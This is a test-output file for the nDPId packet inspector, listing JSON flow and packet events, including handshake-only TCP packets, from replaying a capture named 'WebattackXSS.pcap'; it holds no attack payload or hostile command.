-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347495714,"flow_last_seen":1499347495714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1499347495714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347495714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ai5AAD4GW6KsEAABwKgKMuHOAFCuqYG6AAAAAKACchBfsgAAAgQFtAQCCAoBOuuUAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4406,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":2,"flow_last_seen":1499347495714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347495714,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4c4n\/DE+rqmBu6AScSBGaAAAAgQFtAQCCAoD5L0KATrrlAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4407,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":3,"flow_last_seen":1499347495715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347495715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ai9AAD4GW6msEAABwKgKMuHOAFCuqYG7J\/wxP4AQAOXlbwAAAQEICgE665QD5L0K"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347365320,"flow_last_seen":1499347370718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347365320,"flow_last_seen":1499347370718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347366586,"flow_last_seen":1499347371718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347366586,"flow_last_seen":1499347371718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347369077,"flow_last_seen":1499347374718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347369077,"flow_last_seen":1499347374718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347370339,"flow_last_seen":1499347375719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347370339,"flow_last_seen":1499347375719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347371602,"flow_last_seen":1499347376719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347371602,"flow_last_seen":1499347376719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347374136,"flow_last_seen":1499347379720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347374136,"flow_last_seen":1499347379720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347498249,"flow_last_seen":1499347498249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347498249,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1499347498249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347498249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LPFAAD4GmN+sEAABwKgKMuHoAFBfF8L\/AAAAAKACchBrawAAAgQFtAQCCAoBOu4OAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":2,"flow_last_seen":1499347498249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347498249,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4ejKfeZhXxfDAKAScSD4AgAAAgQFtAQCCAoD5L+DATruDgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":3,"flow_last_seen":1499347498250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347498250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LPJAAD4GmOasEAABwKgKMuHoAFBfF8MAyn3mYoAQAOWXCgAAAQEICgE67g4D5L+D"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347499500,"flow_last_seen":1499347499500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347499500,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1499347499500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347499500,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82IhAAD4G7UesEAABwKgKMuH2AFAMLDfPAAAAAKACchBIQAAAAgQFtAQCCAoBOu9HAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4436,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":2,"flow_last_seen":1499347499500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347499500,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4fa1N28pDCw30KAScSBgHQAAAgQFtAQCCAoD5MC8ATrvRwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4437,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":3,"flow_last_seen":1499347499501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347499501,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02IlAAD4G7U6sEAABwKgKMuH2AFAMLDfQtTdvKoAQAOX\/JAAAAQEICgE670cD5MC8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4450,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347500770,"flow_last_seen":1499347500770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347500770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4450,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1499347500770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347500770,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YZZAAD4GZDqsEAABwKgKMuIEAFAvvZESAAAAAKACchDKIAAAAgQFtAQCCAoBOvCEAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":2,"flow_last_seen":1499347500770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347500770,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4gSIcKZ3L72RE6AScSDWOAAAAgQFtAQCCAoD5MH6ATrwhAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":3,"flow_last_seen":1499347500770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347500770,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YZdAAD4GZEGsEAABwKgKMuIEAFAvvZETiHCmeIAQAOV1QAAAAQEICgE68IQD5MH6"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347503273,"flow_last_seen":1499347503273,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347503273,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1499347503273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347503273,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JtZAAD4GnvqsEAABwKgKMuIeAFAcz9QgAAAAAKACchCXdAAAAgQFtAQCCAoBOvL2AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":2,"flow_last_seen":1499347503273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347503273,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4h43pRReHM\/UIaAScSCEAAAAAgQFtAQCCAoD5MRrATry9gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4468,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":3,"flow_last_seen":1499347503274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347503274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JtdAAD4GnwGsEAABwKgKMuIeAFAcz9QhN6UUX4AQAOUjCAAAAQEICgE68vYD5MRr"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347504529,"flow_last_seen":1499347504529,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347504529,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1499347504529,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347504529,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MbJAAD4GlB6sEAABwKgKMuIsAFBuJcWCAAAAAKACchBTdAAAAgQFtAQCCAoBOvQwAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":2,"flow_last_seen":1499347504529,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347504529,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4iwP0\/y\/biXFg6AScSB+NgAAAgQFtAQCCAoD5MWlATr0MAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4479,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":3,"flow_last_seen":1499347504530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347504530,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MbNAAD4GlCWsEAABwKgKMuIsAFBuJcWDD9P8wIAQAOUdPgAAAQEICgE69DAD5MWl"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347505774,"flow_last_seen":1499347505774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505774,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1499347505774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347505774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e\/VAAD4GSdusEAABwKgKMuI6AFCzho6SAAAAAKACchBDvgAAAgQFtAQCCAoBOvVnAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4490,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":2,"flow_last_seen":1499347505774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347505774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4joOXGebs4aOk6AScSAD5AAAAgQFtAQCCAoD5MbdATr1ZwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":3,"flow_last_seen":1499347505775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347505775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e\/ZAAD4GSeKsEAABwKgKMuI6AFCzho6TDlxnnIAQAOWi6wAAAQEICgE69WcD5Mbd"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347375388,"flow_last_seen":1499347380720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347375388,"flow_last_seen":1499347380720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347376638,"flow_last_seen":1499347381720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347376638,"flow_last_seen":1499347381720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347379171,"flow_last_seen":1499347384721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347379171,"flow_last_seen":1499347384721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 